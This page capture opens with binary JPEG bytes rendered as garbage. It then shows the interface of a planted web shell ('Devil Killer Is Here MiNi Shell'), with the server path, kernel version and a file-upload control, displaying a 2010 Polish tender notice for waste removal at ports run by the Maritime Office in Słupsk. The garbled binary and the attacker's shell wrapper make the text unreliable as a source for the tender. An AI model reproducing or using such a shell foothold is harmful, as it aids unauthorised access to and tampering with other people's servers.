JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/281618-N-2010.html

<p class="kh_header"><b>Słupsk: Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku</b><br>
<b>Numer ogłoszenia: 281618 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Słupsku , Al. Sienkiewicza 18, 76-200 Słupsk, woj. pomorskie, tel. 059 8428406, faks 059 8428406, 8412443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umsl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług w zakresie usuwania i wywozu nieczystości stałych i innych odpadów komunalnych z terenów administrowanych przez Urząd Morski w Słupsku w latach 2011-2013.
Opis przedmiotu zamówienia za pomocą kodu CPV:  
90.51.10.00-2 Usługi wywozu odpadów
2.Zamawiający dokonał podziału przedmiotu zamówienia na części, umożliwiając Wykonawcom składanie ofert częściowych na realizację poszczególnych zadań. 
WSZELKIE ILOŚCI SĄ ILOŚCIAMI SZACUNKOWYMI I SĄ OBLICZONE NA CAŁY OKRES OBOWIĄZYWANIA UMOWY, CZYLI NA OKRES 3 LAT. 


Zadanie nr 1: Kołobrzeg:
1.1. Kapitanatu Portu Kołobrzeg
1)SM - 1100 (1,1 m3) - 
1 szt. -  ul. Morska 8
2) SM - 120 l (0,12 m3) - 1 szt. (bud. Bosmanatu Portu ul. Morska 
3) SM - 1100 l (1,2 m3)- 1 szt. 
  (ul. Warzelnicza)
4)Sprzątanie chodnika  (100 m2) ul. Morska 8,

ilości: wywóz nieczystości: 306 m3
sprzątanie chodnika: 3600 m2
Według grafiku i na żądanie.

1.2. Bosmanatu Portu Dźwirzyno
1)SM - 1100 l (1,1 m3) - 
2 szt. (BP Dźwirzyno 
ul. Wyzwolenia 1
ilość wywozu nieczystości: 238 m3
Według grafiku i na żądanie.

Zadanie nr 2: Łeba

2.1. Teren Portu Łeba
1)SPW - 10 m3 - 1 szt. (na terenie warsztatów w Porcie)
2)SM - 1100 l (1,1 m3) -1 szt.
3)druciak - 1100 l (1,1 m3) -1 szt.
4)Dzwon na opakowania szklane - 1100 l (1,1, m3) -  1 szt.
Ilość wywozu nieczystości: 1413 m3
Według grafiku i na żądanie. 

Zadanie nr 3: Chłopy
3.1. OOW Ustronie Morskie

1. SM - 120 l (0,12 m3) - 
1 szt. (ul. Nadbrzeżna)
2. SM - 240 l (0,24 m3) - 
1 szt. (zaplecze garażowe przy plaży)
3. SM - 1100 l (1,1 m3) - 
1 szt.
4.druciak - na odpady plastikowe min. 1500 l 
(1,5 m3) - 1 szt.
Ilość wywozu nieczystości: 16 m3
Wywóz według grafiku i na żądanie. 

3.2. Obchód Chłopy
1.SM - 240 l (0,24 m3) -1 szt.
Ilość wywozu nieczystości: 16 m3
Według grafiku i na żądanie.

3.3. Latarnia Morska w Gąskach
1)SM - 240l (0,24 m3) - 2     szt.
2)SM - 120l (0,12 m3) - pojemniki metalowe na popiół w czasie sezonu letniego - 1 szt. a w czasie sezonu  zimowego 
- 3 szt.
Ilość wywozu nieczystości: 194 m3
Według grafiku i na żądanie.

3.4. Obchód Mielno
1.SM - 240 l (0,24 m3) - 2 szt.
Ilość wywozu nieczystości: 29 m3
Według grafiku  i na żądanie.

3.5. Przystań Rybacka w Unieściu
1. worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Darłowo 
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 1152 szt.
Według grafiku  i na żądanie.

3.6. Przystań Rybacka w Chłopach
1.worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Kołobrzeg
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 1224 szt.
Według grafiku  i na żądanie.

3.7.Przystań Rybacka w Ustroniu Morskim

1. worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Kołobrzeg
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 288 szt.
Według grafiku i na żądanie.

Zadanie nr 4: Słupsk

4.1. Urzędu Morskiego w Słupsku przy al. Sienkiewicza 18 oraz ul. Niemcewicza 15a
1.SM - 1100 l (1,1 m3) - 3 szt.
2.Sprzątanie chodnika (575 m2) ul. Niemcewicza 15a
Ilość wywozu nieczystości: 259  m3
Ilość sprzątanie chodnika:20 700 m2
Według grafiku i na żądanie.

4.2. Kapitanatu Portu Ustka
1.Sprzątanie chodnika (200 m2) ul. Zaruskiego
2.SPW - 10 m3 - 1 szt.
3.SM - 1100 l (1,1 m3) - 1 szt.
4.druciak- 1500 l (1,5 m3) - 1 szt. 
Ilość sprzątanie chodnika: 7 200 m2
Według grafiku i na żądanie.

4.3. Kapitanatu Portu Ustka - przy Nabrzeżu Słupskim
1)SPW - 10 m3 - 1 szt.
2)SM - 1100 l (1,1 m3) - 1 szt.
3)druciak 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie.

4.4. OOW Ustka ul. Kościuszki
1.SM - 1100 l (1,1 m3) - 2 szt.
Według grafiku i na żądanie.

4.5. OOW Ustka ul. Westerplatte przy plaży
1.SM - 120 l (0,120 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości od pkt 4.2. do pkt 4.5. z wyłączeniem sprzątania chodnika: 1146  m3

4.6. Ośrodek Wczasowy ALGA
1) SM - 1100 l (1,1 m3) - 1  szt.
2)druciak- 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości: 40  m3

4.7. Bosmanatu Portu Rowy - Nabrzeże Południowe
1)SM - 1100 l (1,1 m3) - 1 szt.
2)druciak - 1500 l (1,5 m3) - 1 szt.

Według grafiku i na żądanie

4.8. Bosmanatu Portu Rowy - biuro
1)SM - 1100 l (1,1 m3) - 2 szt.
2)druciak - 1500 l (1,5 m3) - 1 szt.
Według grafiku i na żądanie

Ilość wywozu nieczystości dla pkt 4.7 i 4.8:185 m3

4.9.  Latarnia Morska w  Czołpinie
1.SPW -10 m3 - 1 szt.
Ilość wywozu nieczystości: 30 m3

Według grafiku i na żądanie



2.3.W ramach realizacji każdego z zadań Wykonawca zobowiązany będzie w szczególności do:
2.3.1.wypożyczenia Zamawiającemu pojemników na odpady komunalne,
2.3.2.	sprzątania miejsca posadowienia kontenerów i pojemników na odpady (zamiatanie pozostałości komunalnych jakie wysypały się z kontenerów lub z pojemników na odpady); koszt sprzątania Wykonawca zawrze w cenie wywozu odpadów,
2.3.3.	utylizacji odpadów na składowiskach miejskich lub gminnych, koszty utylizacji Wykonawca zawrze w cenie wywozu odpadów,
2.3.4.	w przypadku wysypania się odpadów w trakcie załadunku lub transportu Wykonawca zobowiązany jest do ich usunięcia,
2.3.5.	usługa wywozu odpadów komunalnych będzie świadczona przy wykorzystaniu narzędzi, urządzeń, pojazdów specjalistycznych i pracowników Wykonawcy,
2.3.6.	Wykonawca zobowiązany jest dołączyć do oferty grafik wywozu nieczystości; w grafiku należy wskazać z jaką częstotliwością będą wywożone nieczystości oraz w które dni tygodnia, jednak wywóz nieczystości nie może odbywać się rzadziej niż raz w tygodniu
2.3.7.	Wykonawca zobowiązany jest do wywozu odpadów komunalnych według grafiku Wykonawcy,
2.3.8.	wywóz na żądanie oznacza, że Wykonawca zobowiązany jest do wywozu wskazanych odpadów 
w terminie nie dłuższym niż 24 godziny od momentu zgłoszenia konieczności tego wywozu,
2.3.9.	Wykonawca zapewnia transport kontenerów i pojemników na odpady do Zamawiającego, a po zakończeniu umowy transport od Zamawiającego,
2.3.10.	kontenery oraz pojemniki na odpady nie mogą być wypożyczone innym podmiotom przez Zamawiającego ani też nie mogą stanowić przedmiotu zbycia,
2.3.11.	kontenery i pojemniki na odpady zostaną zwrócone Wykonawcy w stanie nie gorszym niż wynikający
z prawidłowej eksploatacji po upływie okresu obowiązywania umowy,
2.3.12.	Zamawiający zobowiązuje się do utrzymania drogi dojazdowej do miejsca składowania odpadów 
w stanie umożliwiającym dojazd pojazdów Wykonawcy,
2.3.13.	Zamawiający odpowiada za prawidłowe zabezpieczenie kontenerów i pojemników przed kradzieżą
i zniszczeniem.
2.3.14.	Wykonawca zobowiązany jest do każdorazowego wystawienia karty odpadu nieczystości i jej potwierdzania przez pracownika terenowego Zamawiającego tam gdzie to możliwe,
2.3.15.	Wykonawca zobowiązany jest przy sprzątaniu chodnika do jego odśnieżania i posypywania środkami uszorstniającymi oraz do usuwania lodu do 24 godzin od momentu zgłoszenia, nie rzadziej niż raz w tygodniu. 
2.4.	Zamawiający nie dopuszcza składania ofert  wariantowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada zezwolenie na wykonywanie usług w zakresie usuwania i wywozu nieczystości komunalnych zgodnie z ustawą z 14 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 1996r. Nr 132, poz. 622 z późn. zm);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>15.3.	Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty w następującym zakresie:
15.3.1.	terminu realizacji oraz wielkości realizowanych usług - Zamawiający zastrzega prawo wcześniejszego  rozwiązania umowy z miesięcznym okresem wypowiedzenia w przypadku likwidacji punktu odbioru nieczystości lub w przypadku przejęcia terenu przez inny organ zarządzający; rezygnacja z realizacji części przedmiotu zamówienia spowoduje pomniejszenie wynagrodzenia przysługującego Wykonawcy, przy czym Zamawiający zapłaci za wszystkie zrealizowane świadczenia;
15.3.2.		ceny brutto - w wyniku zmiany obowiązującej stawki VAT:
15.3.2.1.	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę,
15.3.2.2.	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę.
15.3.3.	ceny - o stopień inflacji naliczanej zgodnie ze wskaźnikiem wzrostu cen towarów i usług konsumpcyjnych za rok poprzedni, nie częściej niż raz w roku i nie wcześniej niż od 2012 roku.
15.4.	W żadnym wypadku postanowień klauzuli pkt. 15.5. SIWZ nie należy interpretować jako udzielenie dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie możliwość dokonania zmiany umowy.
15.5.	Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pok. 22 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 10:00, miejsce: Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pok. 22 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku - zadanie 1 - Kołobrzeg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Kapitanatu Portu Kołobrzeg
1)SM - 1100 (1,1 m3) - 
1 szt. -  ul. Morska 8
2) SM - 120 l (0,12 m3) - 1 szt. (bud. Bosmanatu Portu ul. Morska 
3) SM - 1100 l (1,2 m3)- 1 szt. 
  (ul. Warzelnicza)
4)Sprzątanie chodnika  (100 m2) ul. Morska 8,

ilości: wywóz nieczystości: 306 m3
sprzątanie chodnika: 3600 m2
Według grafiku i na żądanie.

1.2. Bosmanatu Portu Dźwirzyno
1)SM - 1100 l (1,1 m3) - 
2 szt. (BP Dźwirzyno 
ul. Wyzwolenia 1
ilość wywozu nieczystości: 238 m3
Według grafiku i na żądanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku - zadanie nr 2 - Łeba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1. Teren Portu Łeba
1)SPW - 10 m3 - 1 szt. (na terenie warsztatów w Porcie)
2)SM - 1100 l (1,1 m3) -1 szt.
3)druciak - 1100 l (1,1 m3) -1 szt.
4)Dzwon na opakowania szklane - 1100 l (1,1, m3) -  1 szt.
Ilość wywozu nieczystości: 1413 m3
Według grafiku i na żądanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku - zadanie 3 - Chłopy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.1. OOW Ustronie Morskie

1. SM - 120 l (0,12 m3) - 
1 szt. (ul. Nadbrzeżna)
2. SM - 240 l (0,24 m3) - 
1 szt. (zaplecze garażowe przy plaży)
3. SM - 1100 l (1,1 m3) - 
1 szt.
4.druciak - na odpady plastikowe min. 1500 l 
(1,5 m3) - 1 szt.
Ilość wywozu nieczystości: 16 m3
Wywóz według grafiku i na żądanie. 

3.2. Obchód Chłopy
1.SM - 240 l (0,24 m3) -1 szt.
Ilość wywozu nieczystości: 16 m3
Według grafiku i na żądanie.

3.3. Latarnia Morska w Gąskach
1)SM - 240l (0,24 m3) - 2     szt.
2)SM - 120l (0,12 m3) - pojemniki metalowe na popiół w czasie sezonu letniego - 1 szt. a w czasie sezonu  zimowego 
- 3 szt.
Ilość wywozu nieczystości: 194 m3
Według grafiku i na żądanie.

3.4. Obchód Mielno
1.SM - 240 l (0,24 m3) - 2 szt.
Ilość wywozu nieczystości: 29 m3
Według grafiku  i na żądanie.

3.5. Przystań Rybacka w Unieściu
1. worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Darłowo 
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 1152 szt.
Według grafiku  i na żądanie.

3.6. Przystań Rybacka w Chłopach
1.worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Kołobrzeg
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 1224 szt.
Według grafiku  i na żądanie.

3.7.Przystań Rybacka w Ustroniu Morskim

1. worki na śmieci dla rybaków -
w uzgodnieniu z Inspektoratem
Ochrony Środowiska w KP Kołobrzeg
2 szt. o pojemności 120 l raz  w miesiącu  z przeznaczeniem na jeden boks).
Ilość worków: 288 szt.
Według grafiku i na żądanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług w zakresie usuwania i wywozu 
nieczystości stałych i innych odpadów komunalnych z terenów 
administrowanych przez Urząd Morski w Słupsku - zadanie 4- Słupsk.</p>
